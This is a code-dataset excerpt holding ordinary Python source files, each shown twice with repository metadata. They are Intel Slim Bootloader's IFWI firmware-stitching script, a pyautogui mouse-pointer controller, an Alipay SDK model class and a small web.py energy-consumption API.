ifwi_data, file_path) if ret != 0: raise Exception ('ADD failed (error code %d) !' % (ret)) patch_flash_map (ifwi_data, platform_data) if bios_out: print ('Creating BIOS image ...') bios = IFWI_PARSER.locate_component (root, 'IFWI/BIOS') fd = open (bios_out, 'wb') fd.write(ifwi_data[bios.offset:bios.offset+bios.length]) fd.close() print ('Creating IFWI image ...') fd = open (ifwi_out, 'wb') fd.write(ifwi_data) fd.close() print ('Done!') def print_ifwi_layout (ifwi_file): ifwi_parser = IFWI_PARSER () ifwi_bin = bytearray (get_file_data (ifwi_file)) ifwi = ifwi_parser.parse_ifwi_binary (ifwi_bin) if ifwi: ifwi_parser.print_tree (ifwi) else: print ('Invalid IFWI image') return 0 if __name__ == '__main__': hexstr = lambda x: int(x, 16) ap = argparse.ArgumentParser() ap.add_argument('-i', '--input-ifwi-file', dest='ifwi_in', type=str, required=True, help='specify input template IFWI image file path') ap.add_argument('-o', '--output-ifwi-file', dest='ifwi_out', type=str, default='', help='specify generated output IFWI image file path') ap.add_argument('-b', '--output-bios-region', dest='bios_out', type=str, default='', help='specify generated output BIOS region image file path') ap.add_argument('-s', '--sitch-zip-file', dest='stitch_in', type=str, default='', help='specify input sitching zip package file path') ap.add_argument('-p', '--platform-data', dest='plat_data', type=hexstr, default=0xFFFFFFFF, help='specify a platform specific data (HEX, DWORD) for customization') ap.add_argument('-n', '--non-redundant', dest='non_redundant', action="store_true", help='specify if the flash layout will be full redundant or not') if len(sys.argv) == 1: print('%s' % extra_usage_txt) args = ap.parse_args() if args.ifwi_out == '' and args.stitch_in == '': print_ifwi_layout (args.ifwi_in) sys.exit (0) else: if args.ifwi_out and args.stitch_in == '': ret = create_ifwi_image (args.ifwi_in, args.ifwi_out, args.bios_out, args.plat_data, args.non_redundant, None) sys.exit (ret) # Unpack files from zip print ("Unpacking sitching ZIP package ...") output_dir = os.path.dirname(args.ifwi_out) stitch_dir = os.path.join(output_dir, 'stitch_comp') if os.path.exists(stitch_dir): shutil.rmtree(stitch_dir) zf = zipfile.ZipFile(args.stitch_in, 'r', zipfile.ZIP_DEFLATED) zf.extractall(stitch_dir) zf.close() # Create new IFWI ret = create_ifwi_image (args.ifwi_in, args.ifwi_out, args.bios_out, args.plat_data, args.non_redundant, stitch_dir) # Remove extracted files if os.path.exists(stitch_dir): shutil.rmtree(stitch_dir) sys.exit (ret)
38.896552
154
0.590772
port re import sys import struct import argparse import zipfile import shutil from ctypes import * from subprocess import check_output from functools import reduce sys.dont_write_bytecode = True sblopen_dir = os.path.abspath(os.path.join(os.path.dirname(__file__), '../../../')) if not os.path.exists (sblopen_dir): sblopen_dir = os.getenv('SBL_SOURCE', '') sys.path.append (os.path.join(sblopen_dir, 'BootloaderCorePkg' , 'Tools')) try: from IfwiUtility import * except ImportError: err_msg = "Cannot find IfwiUtility module!\n" err_msg += "Please make sure 'SBL_SOURCE' environment variable is set to open source SBL root folder." raise ImportError(err_msg) extra_usage_txt = \ """This script creates a new Apollo Lake Slim Bootloader IFWI image basing on an existing IFWI base image. Please note, this stitching method will work only if Boot Guard in the base image is not enabled, and the silicon is not fused with Boot Guard enabled. Please follow steps below: 1. Download an existing Apollo Lake UEFI IFWI image associated with the target platform, such as MinnowBoard 3, LeafHill, etc. The URL is below: https://firmware.intel.com/projects/minnowboard3 Alternatively, the original IFWI image from the onboard SPI flash can be read out as the base image too. 2. Build Slim Bootloader source tree and generate a stitching ZIP package. The generated ZIP package is located at: $(WORKSPACE)/Outputs/apl/Stitch_Components.zip 3. Stitch to create a new IFWI image. EX: python StitchLoader.py -i LEAFHILD.X64.0070.R01.1805070352.bin -s Stitch_Components.zip -o SlimBoot.bin 4. Optionally, to view the flash layout for an given IFWI image, specify '-i' option only. EX: python StitchLoader.py -i LEAFHILD.X64.0070.R01.1805070352.bin """ FILE_ALIGN = 0x1000 class IFWI_MANIPULATE: def add_component (self, root, path, before = '$', file_path = ''): nodes = path.split('/') parent_path = '/'.join(nodes[:-1]) dir_comp = IFWI_PARSER.locate_component (root, parent_path) if not dir_comp: print ('Cannot find DIR %s !' % '/'.join(nodes[:-1])) return -1 if dir_comp.type != COMPONENT.COMP_TYPE['PART']: print ('Can only add FILE type !') return -2 index = None if before == '$': index = len(dir_comp.child) elif before == '^': index = 0 else: for idx, file in enumerate(dir_comp.child): if before == file.name: index = idx if index is None: print ('Cannot find FILE %s !' % before) return -3 else: length = os.path.getsize(file_path) if file_path else 0x1000 comp = COMPONENT (nodes[-1], COMPONENT.COMP_TYPE['FILE'], 0, length) comp.set_data (file_path) dir_comp.add_child (comp, index) return 0 def remove_component (self, root, path): nodes = path.split('/') parent_path = '/'.join(nodes[:-1]) dir_comp = IFWI_PARSER.locate_component (root, parent_path) if not dir_comp: print ('Cannot find DIR %s !' % '/'.join(nodes[:-1])) return -1 if dir_comp.type != COMPONENT.COMP_TYPE['PART']: print ('Can only replace FILE type !') return -2 index = None for idx, file in enumerate(dir_comp.child): if file.name == nodes[-1]: index = idx break if index is None: print ('Cannot find FILE %s !' % path) return -3 else: del dir_comp.child[index] return 0 def replace_component (self, root, path, file_path): comp = IFWI_PARSER.locate_component (root, path) if not comp: print ('Cannot find FILE %s !' % path) return -1 if comp.type != COMPONENT.COMP_TYPE['FILE']: print ('Can only replace FILE type !' % path) return -2 comp.length = os.path.getsize(file_path) if file_path else 0x1000 if file_path: comp.set_data (file_path) return 0 def copy_component (self, root, path, ifwi_data): print ("COPY BP0 BPDT to BP1 BPDT ...") bp1 = IFWI_PARSER.locate_component (root, 'IFWI/BIOS/BP1') bp0bpdt = IFWI_PARSER.locate_component (root, 'IFWI/BIOS/BP0/BPDT') bp1bpdt = IFWI_PARSER.locate_component (root, 'IFWI/BIOS/BP1/BPDT') bp1sbpdt = IFWI_PARSER.locate_component (root, 'IFWI/BIOS/BP1/SBPDT') bp0bpdt_data = bytearray(ifwi_data[bp0bpdt.offset :bp0bpdt.offset + bp0bpdt.length]) bp1sbpdt_data = bytearray(ifwi_data[bp1sbpdt.offset:bp1sbpdt.offset + bp1sbpdt.length]) bp1sbpdt_offset = bp1bpdt.offset + bp0bpdt.length ifwi_data[bp1bpdt.offset:bp1sbpdt_offset] = bp0bpdt_data bp1sbpdt_end_offset = bp1sbpdt_offset + bp1sbpdt.length ifwi_data[bp1sbpdt_offset:bp1sbpdt_end_offset] = bp1sbpdt_data padding = bp1.offset + bp1.length - bp1sbpdt_end_offset if padding < 0: print ('Insufficiant space in BP1 partition !') return -1 ifwi_data[bp1sbpdt_end_offset:bp1sbpdt_end_offset + padding] = b'\xff' * padding offset = bp1bpdt.offset bpdt_hdr = BPDT_HEADER.from_buffer(ifwi_data, offset) offset += sizeof(BPDT_HEADER) for idx in range(bpdt_hdr.desc_cnt): bpdt_entry = BPDT_ENTRY.from_buffer(ifwi_data, offset) if "BpdtSbpdt" == str(bpdt_entry.type): bpdt_entry.sub_part_size = bp1sbpdt.length offset += sizeof(BPDT_ENTRY) offset = bp1sbpdt_offset bpdt_hdr = BPDT_HEADER.from_buffer(ifwi_data, offset) offset += sizeof(BPDT_HEADER) for idx in range(bpdt_hdr.desc_cnt): bpdt_entry = BPDT_ENTRY.from_buffer(ifwi_data, offset) bpdt_entry.sub_part_offset += (bp0bpdt.length - bp1bpdt.length) offset += sizeof(BPDT_ENTRY) print ("Done!") return 0 def create_dir_data (self, dir, ifwi_data): support_list = ["BpdtIbb", "BpdtObb"] if dir.name not in support_list: raise Exception ('Only %s are supported !' % ' '.join(support_list)) adjust = True offset = len(dir.child) * sizeof(SUBPART_DIR_ENTRY) + sizeof(SUBPART_DIR_HEADER) sub_dir_hdr = SUBPART_DIR_HEADER.from_buffer(ifwi_data, dir.offset) dir_data = bytearray(sub_dir_hdr) + b'\xff' * (offset - sizeof(SUBPART_DIR_HEADER)) for idx, comp in enumerate(dir.child): delta = 0 parts = os.path.splitext(comp.name) if len(parts) > 1 and parts[1] in ['.man', '.met']: align = 1 elif comp.name in ['IPAD', 'OPAD']: align = 0x40 else: align = FILE_ALIGN delta = dir.offset & (FILE_ALIGN - 1) next_offset = ((offset + delta + align - 1) & ~(align - 1)) count = next_offset - offset if adjust: adjust = False count -= delta dir_data.extend(b'\xff' * count) comp_data = comp.get_data() if comp_data: dir_data.extend(comp_data) else: dir_data.extend(ifwi_data[comp.offset : comp.offset + comp.length]) sub_dir = SUBPART_DIR_ENTRY() sub_dir.entry_name = comp.name.encode() sub_dir.entry_offset = next_offset - delta sub_dir.entry_size = comp.length sub_dir.reserved1 = 0 sub_dir.reserved2 = 0 entry_offset = idx * sizeof(SUBPART_DIR_ENTRY) + sizeof(SUBPART_DIR_HEADER) dir_data[entry_offset:entry_offset+sizeof(SUBPART_DIR_ENTRY)] = bytearray(sub_dir) next_offset += comp.length offset = next_offset align = FILE_ALIGN next_offset = ((offset + align - 1) & ~(align - 1)) dir_data.extend(b'\xff' * (next_offset - offset)) sub_dir_hdr = SUBPART_DIR_HEADER.from_buffer_copy(dir_data) sub_dir_hdr.num_of_entries = len(dir.child) sub_dir_hdr.checksum = 0 dir_data[:sizeof(SUBPART_DIR_HEADER)] = bytearray(sub_dir_hdr) length = sub_dir_hdr.num_of_entries * sizeof(SUBPART_DIR_ENTRY) + sizeof(SUBPART_DIR_HEADER) sum_buf = (c_uint8 * length).from_buffer_copy(dir_data) sub_dir_hdr.checksum = (~sum(sum_buf) + 1) & 0xFF dir_data[:sizeof(SUBPART_DIR_HEADER)] = bytearray(sub_dir_hdr) remaining = (dir.offset + len(dir_data)) & (FILE_ALIGN - 1) if remaining: dir_data.extend(b'\xff' * (FILE_ALIGN - remaining)) return dir_data def refresh_ifwi_for_dir (self, dir, ifwi_data): dir_data = self.create_dir_data (dir, ifwi_data) length = len (dir_data) adjust_length = length - dir.length if (dir.offset + length) & (FILE_ALIGN - 1): print ('DIR total size needs to be 4KB aligned !') org_bpdt_offset = dir.parent.parent.child[0].offset org_sbpdt_offset = dir.parent.parent.child[1].offset old_dir = dir while dir.type != COMPONENT.COMP_TYPE['BP']: for each in dir.parent.child: if each.offset > dir.offset: each.offset += adjust_length dir.length += adjust_length dir = dir.parent dir = old_dir parent = dir.parent bpdt_hdr = BPDT_HEADER.from_buffer(ifwi_data, parent.offset) base = parent.offset + sizeof(BPDT_HEADER) found = False for idx in range(bpdt_hdr.desc_cnt): bpdt_entry = BPDT_ENTRY.from_buffer(ifwi_data, base + idx * sizeof(BPDT_ENTRY)) comps = [x for x in parent.child if x.name == str(bpdt_entry.type)] if len(comps) == 0: continue if len(comps) > 1: raise Exception ('Found duplicated DIR %s !', bpdt_entry.type) bpdt_entry.sub_part_offset = comps[0].offset - parent.parent.offset if dir.name == str(bpdt_entry.type): bpdt_entry.sub_part_size = length found = True if not found: raise Exception ('Could not find DIR %s !', dir.name) bp_comp = parent.parent if parent.name == 'BPDT': bpdt_hdr = BPDT_HEADER.from_buffer (ifwi_data, org_sbpdt_offset) bpdt_hdr.xor_sum = 0 base_offset = org_sbpdt_offset + sizeof(BPDT_HEADER) for idx in range(bpdt_hdr.desc_cnt): bpdt_entry = BPDT_ENTRY.from_buffer(ifwi_data, base_offset + idx * sizeof(BPDT_ENTRY)) bpdt_entry.sub_part_offset += adjust_length if (bpdt_entry.sub_part_offset + bpdt_entry.sub_part_size) > bp_comp.length: raise Exception ('Insufficiant space in layout !') else: bpdt_hdr = BPDT_HEADER.from_buffer (ifwi_data, org_bpdt_offset) bpdt_hdr.xor_sum = 0 base_offset = org_bpdt_offset + sizeof(BPDT_HEADER) for idx in range(bpdt_hdr.desc_cnt): bpdt_entry = BPDT_ENTRY.from_buffer(ifwi_data, base_offset + idx * sizeof(BPDT_ENTRY)) if str(bpdt_entry.type) == "BpdtSbpdt": bpdt_entry.sub_part_size += adjust_length if (bpdt_entry.sub_part_offset + bpdt_entry.sub_part_size) > bp_comp.length: raise Exception ('Insufficiant space in layout !') if adjust_length > 0: ifwi_data[:] = ifwi_data[:old_dir.offset] + dir_data + \ ifwi_data[old_dir.offset + old_dir.length - adjust_length : bp_comp.offset + bp_comp.length - adjust_length] + \ ifwi_data[bp_comp.offset + bp_comp.length:] else: adjust_length = -adjust_length ifwi_data[:] = ifwi_data[:old_dir.offset] + dir_data + \ ifwi_data[old_dir.offset + old_dir.length + adjust_length: bp_comp.offset + bp_comp.length] + \ b'\xff' * adjust_length + ifwi_data[bp_comp.offset + bp_comp.length:] return 0 def manipulate_ifwi (action, path, ifwi_data, file_name = '', before = '$'): print ('%s %s ...' % (action, path)) root = IFWI_PARSER.parse_ifwi_binary (ifwi_data) ifwi_op = IFWI_MANIPULATE() if action == "REMOVE": ret = ifwi_op.remove_component (root, path) elif action == "ADD": ret = ifwi_op.add_component (root, path, before, file_name) elif action == "REPLACE": ret = ifwi_op.replace_component (root, path, file_name) elif action == "COPY": ret = ifwi_op.copy_component (root, 'IFWI/BIOS/BP0/BPDT', ifwi_data) else: ret = -100 if ret == 0 and path: dir_path = '/'.join(path.split('/')[:-1]) dir = IFWI_PARSER.locate_component (root, dir_path) ifwi_op.refresh_ifwi_for_dir (dir, ifwi_data) print ('done!') return ret def patch_flash_map (image_data, platform_data = 0xffffffff): comp_bpdt_dict = { b'RSVD' : "IFWI/BIOS/BP1/SBPDT/BpdtObb/RSVD", b'IAS1' : "IFWI/BIOS/BP1/SBPDT/BpdtObb/FB", b'EPLD' : "IFWI/BIOS/BP1/SBPDT/BpdtObb/EPLD", b'UVAR' : "IFWI/BIOS/BP1/SBPDT/BpdtObb/UVAR", b'PYLD' : "IFWI/BIOS/BP0/BPDT/BpdtIbb/PLD", b'VARS' : "IFWI/BIOS/BP0/BPDT/BpdtIbb/VAR", b'MRCD' : "IFWI/BIOS/BP0/BPDT/BpdtIbb/MRCD", b'CNFG' : "IFWI/BIOS/BP0/BPDT/BpdtIbb/CFGD", b'KEYH' : "IFWI/BIOS/BP0/BPDT/BpdtIbb/KEYH", b'FWUP' : "IFWI/BIOS/BP0/BPDT/BpdtIbb/FWUP", b'SG02' : "IFWI/BIOS/BP0/BPDT/BpdtIbb/OBB", b'SG1B' : "IFWI/BIOS/BP0/BPDT/BpdtIbb/IBB", b'SG1A' : "IFWI/BIOS/BP0/BPDT/BpdtIbb/IBBL", b'_BPM' : "IFWI/BIOS/BP0/BPDT/BpdtIbb/BPM.met", } print ("Patching Slim Bootloader Flash Map table ...") output_image_data = image_data ifwi = IFWI_PARSER.parse_ifwi_binary (output_image_data) if not ifwi: return -1 pld = IFWI_PARSER.locate_component (ifwi, comp_bpdt_dict[b'PYLD']) if not pld: comp_bpdt_dict[b'PYLD'] = "IFWI/BIOS/BP1/SBPDT/BpdtObb/PLD" bp0 = IFWI_PARSER.locate_component (ifwi, 'IFWI/BIOS/BP0') bp1 = IFWI_PARSER.locate_component (ifwi, 'IFWI/BIOS/BP1') if not bp0 or not bp1: return -2 for part in range(2): path = comp_bpdt_dict[b'SG1A'].replace("BP0", "BP%d" % part) comp = IFWI_PARSER.locate_component (ifwi, path) if not comp: if part == 0: raise Exception("Cannot locate %s !" % path) else: continue stage1AOffset = comp.offset stage1ALength = comp.length temp = stage1AOffset + stage1ALength - 8 c_uint32.from_buffer (output_image_data, temp - 4).value = platform_data fla_map_off = (bytes_to_value(output_image_data[temp:temp+4]) + stage1ALength) & 0xFFFFFFFF fla_map_str = FLASH_MAP.from_buffer (output_image_data, stage1AOffset + fla_map_off) entry_num = (fla_map_str.length - sizeof(FLASH_MAP)) // sizeof(FLASH_MAP_DESC) fla_map_str.romsize = bp0.length + bp1.length if part == 1: fla_map_str.attributes |= FLASH_MAP.FLASH_MAP_ATTRIBUTES['BACKUP_REGION'] for idx in range (entry_num): desc = FLASH_MAP_DESC.from_buffer (output_image_data, stage1AOffset + fla_map_off + sizeof(FLASH_MAP) + idx * sizeof(FLASH_MAP_DESC)) path = comp_bpdt_dict[desc.sig] if part == 1 or (desc.flags & FLASH_MAP.FLASH_MAP_DESC_FLAGS['NON_REDUNDANT']): path = path.replace("BP0", "BP1") if part == 1 and (desc.flags & FLASH_MAP.FLASH_MAP_DESC_FLAGS['REDUNDANT']): desc.flags |= FLASH_MAP.FLASH_MAP_DESC_FLAGS['BACKUP'] if desc.sig == b'RSVD': desc.offset = bp1.offset + bp1.length - desc.size - bp0.offset continue comp = IFWI_PARSER.locate_component (ifwi, path) if not comp: if desc.sig == b'KEYH': continue raise Exception("Cannot locate component '%s' in BPDT !" % path) if (desc.size == 0) and (desc.offset == 0): desc.size = comp.length desc.offset = comp.offset - bp0.offset continue if desc.size != comp.length and comp.name != 'FB': raise Exception("Mismatch component '%s' length in FlashMap and BPDT !" % comp_bpdt_dict[desc.sig]) if desc.sig not in [b'_BPM'] and (comp.offset & 0xFFF > 0): raise Exception("Component '%s' %x is not aligned at 4KB boundary, " \ "please adjust padding size for IPAD/OPAD in BoardConfig.py and rebuild !" % (comp_bpdt_dict[desc.sig], comp.offset)) desc.offset = comp.offset - bp0.offset if (bp1.offset + bp1.length - 0x1000) <= (desc.offset + desc.size) <= (bp1.offset + bp1.length): raise Exception("Component '%s' offset is in bootloader reserved region, please try to reduce compoent size !" % comp_bpdt_dict[desc.sig]) limit = bp1.offset + bp1.length - bp0.offset - 0x40000 for idx in range (entry_num): desc = FLASH_MAP_DESC.from_buffer (output_image_data, stage1AOffset + fla_map_off + sizeof(FLASH_MAP) + idx * sizeof(FLASH_MAP_DESC)) if desc.sig == b'RSVD': continue if desc.offset >= limit or desc.offset + desc.size > limit: print("WARNING: Component '%s' in BP%d is located inside CSME memory mapped region, direct access might fail." % (desc.sig, part)) print ("Flash map was patched successfully!") return 0 def create_ifwi_image (ifwi_in, ifwi_out, bios_out, platform_data, non_redundant, stitch_dir): redundant_payload = True ifwi_data = bytearray (get_file_data (ifwi_in)) root = IFWI_PARSER.parse_ifwi_binary (ifwi_data) if not root: raise Exception ('Invalid IFWI input image format !') comp = IFWI_PARSER.locate_component (root, "IFWI/BIOS/BP0/BPDT/BpdtUepType") if not comp: raise Exception ('Unsupported base image format !') data = ifwi_data[comp.offset + 0x30:comp.offset + 0x32] if (data[0] & 0x0F) != 0x00: raise Exception ('Unsupported base image type. boot guard might have been enabled in this image !') print ('Creating %sredundant image ...' % ('non-' if non_redundant else '')) remove_list = [ "IFWI/BIOS/BP0/BPDT/BpdtIbb", "IFWI/BIOS/BP1/BPDT/BpdtIbb", "IFWI/BIOS/BP1/SBPDT/BpdtObb" ] for dir_path in remove_list: comp = IFWI_PARSER.locate_component (root, dir_path) if not comp: continue for each in comp.child: if each.name.endswith('.man') or each.name.endswith('.met'): continue ret = manipulate_ifwi ('REMOVE', dir_path + '/' + each.name, ifwi_data) if ret != 0: raise Exception ('REMOVE failed (error code %d) !' % (ret)) if not non_redundant: ret = manipulate_ifwi ('COPY', '', ifwi_data) if ret != 0: raise Exception ('COPY failed (error code %d) !' % (ret)) if stitch_dir: ibb_list = [ ('IBBL' , 'IBBL'), ('IBB' , 'IBBM'), ('OBB' , 'OBB'), ('FWUP' , 'FWU'), ('CFGD' , 'CFGDATA'), ('KEYH' , 'KEYHASH'), ('VAR' , 'VAR'), ('MRCD' , 'MRCDATA'), ('PLD' , 'PLD'), ] obb_list = [ ('FB' , 'FB'), ('EPLD' , 'EPLD'), ('UVAR' , 'UVAR'), ('PLD' , 'PLD'), ] opt_list = [ 'EPLD', 'UVAR' ] if redundant_payload: del obb_list[-1] else: del ibb_list[-1] bp1sbpdt = "IFWI/BIOS/BP1/SBPDT/BpdtObb/" loop = 1 if non_redundant else 2 for bp in range(loop): dir = "IFWI/BIOS/BP%d/BPDT/BpdtIbb/" % bp for comp_name, file_name in ibb_list: file_path = os.path.join(stitch_dir, 'Stitch_%s.bin' % file_name) ret = manipulate_ifwi ('ADD', dir + comp_name, ifwi_data, file_path) if ret != 0: raise Exception ('ADD failed (error code %d) !' % (ret)) for comp_name, file_name in obb_list: if file_name == '': file_path = '' else: file_path = os.path.join(stitch_dir, 'Stitch_%s.bin' % file_name) if (comp_name in opt_list) and not os.path.exists(file_path): ret = 0 else: ret = manipulate_ifwi ('ADD', bp1sbpdt + comp_name, ifwi_data, file_path) if ret != 0: raise Exception ('ADD failed (error code %d) !' % (ret)) patch_flash_map (ifwi_data, platform_data) if bios_out: print ('Creating BIOS image ...') bios = IFWI_PARSER.locate_component (root, 'IFWI/BIOS') fd = open (bios_out, 'wb') fd.write(ifwi_data[bios.offset:bios.offset+bios.length]) fd.close() print ('Creating IFWI image ...') fd = open (ifwi_out, 'wb') fd.write(ifwi_data) fd.close() print ('Done!') def print_ifwi_layout (ifwi_file): ifwi_parser = IFWI_PARSER () ifwi_bin = bytearray (get_file_data (ifwi_file)) ifwi = ifwi_parser.parse_ifwi_binary (ifwi_bin) if ifwi: ifwi_parser.print_tree (ifwi) else: print ('Invalid IFWI image') return 0 if __name__ == '__main__': hexstr = lambda x: int(x, 16) ap = argparse.ArgumentParser() ap.add_argument('-i', '--input-ifwi-file', dest='ifwi_in', type=str, required=True, help='specify input template IFWI image file path') ap.add_argument('-o', '--output-ifwi-file', dest='ifwi_out', type=str, default='', help='specify generated output IFWI image file path') ap.add_argument('-b', '--output-bios-region', dest='bios_out', type=str, default='', help='specify generated output BIOS region image file path') ap.add_argument('-s', '--sitch-zip-file', dest='stitch_in', type=str, default='', help='specify input sitching zip package file path') ap.add_argument('-p', '--platform-data', dest='plat_data', type=hexstr, default=0xFFFFFFFF, help='specify a platform specific data (HEX, DWORD) for customization') ap.add_argument('-n', '--non-redundant', dest='non_redundant', action="store_true", help='specify if the flash layout will be full redundant or not') if len(sys.argv) == 1: print('%s' % extra_usage_txt) args = ap.parse_args() if args.ifwi_out == '' and args.stitch_in == '': print_ifwi_layout (args.ifwi_in) sys.exit (0) else: if args.ifwi_out and args.stitch_in == '': ret = create_ifwi_image (args.ifwi_in, args.ifwi_out, args.bios_out, args.plat_data, args.non_redundant, None) sys.exit (ret) print ("Unpacking sitching ZIP package ...") output_dir = os.path.dirname(args.ifwi_out) stitch_dir = os.path.join(output_dir, 'stitch_comp') if os.path.exists(stitch_dir): shutil.rmtree(stitch_dir) zf = zipfile.ZipFile(args.stitch_in, 'r', zipfile.ZIP_DEFLATED) zf.extractall(stitch_dir) zf.close() ret = create_ifwi_image (args.ifwi_in, args.ifwi_out, args.bios_out, args.plat_data, args.non_redundant, stitch_dir) if os.path.exists(stitch_dir): shutil.rmtree(stitch_dir) sys.exit (ret)
true
true
f705c96c12e4e0c7f7af29723e12d8fbcdab4c40
907
py
Python
src/mouse_controller.py
NAITTOU/computer_pointer_controller
b36ce51e7638543b54da1abe56f7ae54eb21918f
[ "MIT" ]
1
2020-09-04T06:28:43.000Z
2020-09-04T06:28:43.000Z
src/mouse_controller.py
NAITTOU/computer_pointer_controller
b36ce51e7638543b54da1abe56f7ae54eb21918f
[ "MIT" ]
1
2022-01-13T02:59:41.000Z
2022-01-13T02:59:41.000Z
src/mouse_controller.py
NAITTOU/computer_pointer_controller
b36ce51e7638543b54da1abe56f7ae54eb21918f
[ "MIT" ]
null
null
null
''' This is a sample class that you can use to control the mouse pointer. It uses the pyautogui library. You can set the precision for mouse movement (how much the mouse moves) and the speed (how fast it moves) by changing precision_dict and speed_dict. Calling the move function with the x and y output of the gaze estimation model will move the pointer. This class is provided to help get you started; you can choose whether you want to use it or create your own from scratch. ''' import pyautogui pyautogui.FAILSAFE = False class MouseController: def __init__(self, precision, speed): precision_dict={'high':100, 'low':1000, 'medium':500} speed_dict={'fast':1, 'slow':10, 'medium':5} self.precision=precision_dict[precision] self.speed=speed_dict[speed] def move(self, x, y): pyautogui.moveRel(x*self.precision, -1*y*self.precision, duration=self.speed)
43.190476
122
0.732084
import pyautogui pyautogui.FAILSAFE = False class MouseController: def __init__(self, precision, speed): precision_dict={'high':100, 'low':1000, 'medium':500} speed_dict={'fast':1, 'slow':10, 'medium':5} self.precision=precision_dict[precision] self.speed=speed_dict[speed] def move(self, x, y): pyautogui.moveRel(x*self.precision, -1*y*self.precision, duration=self.speed)
true
true
f705c9972c508fc15446070fc555ad919151b644
1,253
py
Python
alipay/aop/api/domain/AntOcrVehicleplateIdentifyModel.py
alipay/alipay-sdk-python-all
1b63620431d982d30d39ee0adc4b92463cbcee3c
[ "Apache-2.0" ]
213
2018-08-27T16:49:32.000Z
2021-12-29T04:34:12.000Z
alipay/aop/api/domain/AntOcrVehicleplateIdentifyModel.py
alipay/alipay-sdk-python-all
1b63620431d982d30d39ee0adc4b92463cbcee3c
[ "Apache-2.0" ]
29
2018-09-29T06:43:00.000Z
2021-09-02T03:27:32.000Z
alipay/aop/api/domain/AntOcrVehicleplateIdentifyModel.py
alipay/alipay-sdk-python-all
1b63620431d982d30d39ee0adc4b92463cbcee3c
[ "Apache-2.0" ]
59
2018-08-27T16:59:26.000Z
2022-03-25T10:08:15.000Z
#!/usr/bin/env python # -*- coding: utf-8 -*- import json from alipay.aop.api.constant.ParamConstants import * class AntOcrVehicleplateIdentifyModel(object): def __init__(self): self._image = None self._type = None @property def image(self): return self._image @image.setter def image(self, value): self._image = value @property def type(self): return self._type @type.setter def type(self, value): self._type = value def to_alipay_dict(self): params = dict() if self.image: if hasattr(self.image, 'to_alipay_dict'): params['image'] = self.image.to_alipay_dict() else: params['image'] = self.image if self.type: if hasattr(self.type, 'to_alipay_dict'): params['type'] = self.type.to_alipay_dict() else: params['type'] = self.type return params @staticmethod def from_alipay_dict(d): if not d: return None o = AntOcrVehicleplateIdentifyModel() if 'image' in d: o.image = d['image'] if 'type' in d: o.type = d['type'] return o
22.375
61
0.545092
import json from alipay.aop.api.constant.ParamConstants import * class AntOcrVehicleplateIdentifyModel(object): def __init__(self): self._image = None self._type = None @property def image(self): return self._image @image.setter def image(self, value): self._image = value @property def type(self): return self._type @type.setter def type(self, value): self._type = value def to_alipay_dict(self): params = dict() if self.image: if hasattr(self.image, 'to_alipay_dict'): params['image'] = self.image.to_alipay_dict() else: params['image'] = self.image if self.type: if hasattr(self.type, 'to_alipay_dict'): params['type'] = self.type.to_alipay_dict() else: params['type'] = self.type return params @staticmethod def from_alipay_dict(d): if not d: return None o = AntOcrVehicleplateIdentifyModel() if 'image' in d: o.image = d['image'] if 'type' in d: o.type = d['type'] return o
true
true
f705ca0b99c4431c3fdc996319aa370d49c274ac
1,827
py
Python
newDataAnalytics.py
PeterJWei/EnergyFootprinting
0396efba7d4e6863452e322f9f7561c6cd756478
[ "MIT" ]
null
null
null
newDataAnalytics.py
PeterJWei/EnergyFootprinting
0396efba7d4e6863452e322f9f7561c6cd756478
[ "MIT" ]
null
null
null
newDataAnalytics.py
PeterJWei/EnergyFootprinting
0396efba7d4e6863452e322f9f7561c6cd756478
[ "MIT" ]
null
null
null
import json import web import calendar import datetime import cloudserver urls = ( "/BuildingFootprint/", "BuildingFootprint", "/BuildingFootprintDisaggregated/", "BuildingFootprintDisaggregated", "/PersonalConsumption/", "PersonalConsumption", "/HistoricalConsumption/", "HistoricalConsumption") class BuildingFootprint: def GET(self): raw_time = web.input() if "end" not in raw_time: end = calendar.timegm(datetime.datetime.utcnow().utctimetuple()) else: end = float(raw_time['end']) if "start" not in raw_time: start = calendar.timegm(datetime.datetime.utcnow().utctimetuple())-24*60*60 #1 day else: start = float(raw_time['start']) return cloudserver.db.buildingFootprint(start, end) class BuildingFootprintDisaggregated: def GET(self): raw_time = web.input() if "end" not in raw_time: end = calendar.timegm(datetime.datetime.utcnow().utctimetuple()) else: end = float(raw_time['end']) if "start" not in raw_time: start = calendar.timegm(datetime.datetime.utcnow().utctimetuple())-24*60*60 #1 day else: start = float(raw_time['start']) return cloudserver.db.buildingFootprintDisaggregated(start, end) class PersonalConsumption: def GET(self): print("Got to Personal Consumption") raw_data = web.input() end = calendar.timegm(datetime.datetime.utcnow().utctimetuple()) if "end" in raw_data: end = float(raw_data['end']) start = calendar.timegm(datetime.datetime.utcnow().utctimetuple())-24*60*60 #1 day if "start" in raw_data: start = float(raw_data['start']) user = "Peter Wei" if "user" in raw_data: user = raw_data['user'] return cloudserver.db.personalFootprint(user, start, end) class HistoricalConsumption: def GET(self): return cloudserver.db.historicalConsumption() dataExtraction = web.application(urls, locals())
26.478261
85
0.727422
import json import web import calendar import datetime import cloudserver urls = ( "/BuildingFootprint/", "BuildingFootprint", "/BuildingFootprintDisaggregated/", "BuildingFootprintDisaggregated", "/PersonalConsumption/", "PersonalConsumption", "/HistoricalConsumption/", "HistoricalConsumption") class BuildingFootprint: def GET(self): raw_time = web.input() if "end" not in raw_time: end = calendar.timegm(datetime.datetime.utcnow().utctimetuple()) else: end = float(raw_time['end']) if "start" not in raw_time: start = calendar.timegm(datetime.datetime.utcnow().utctimetuple())-24*60*60 else: start = float(raw_time['start']) return cloudserver.db.buildingFootprint(start, end) class BuildingFootprintDisaggregated: def GET(self): raw_time = web.input() if "end" not in raw_time: end = calendar.timegm(datetime.datetime.utcnow().utctimetuple()) else: end = float(raw_time['end']) if "start" not in raw_time: start = calendar.timegm(datetime.datetime.utcnow().utctimetuple())-24*60*60 else: start = float(raw_time['start']) return cloudserver.db.buildingFootprintDisaggregated(start, end) class PersonalConsumption: def GET(self): print("Got to Personal Consumption") raw_data = web.input() end = calendar.timegm(datetime.datetime.utcnow().utctimetuple()) if "end" in raw_data: end = float(raw_data['end']) start = calendar.timegm(datetime.datetime.utcnow().utctimetuple())-24*60*60 if "start" in raw_data: start = float(raw_data['start']) user = "Peter Wei" if "user" in raw_data: user = raw_data['user'] return cloudserver.db.personalFootprint(user, start, end) class HistoricalConsumption: def GET(self): return cloudserver.db.historicalConsumption() dataExtraction = web.application(urls, locals())
true
true
f705ca2749b113501167b31f27c6bb73734fd6c0
2,235
py
Python
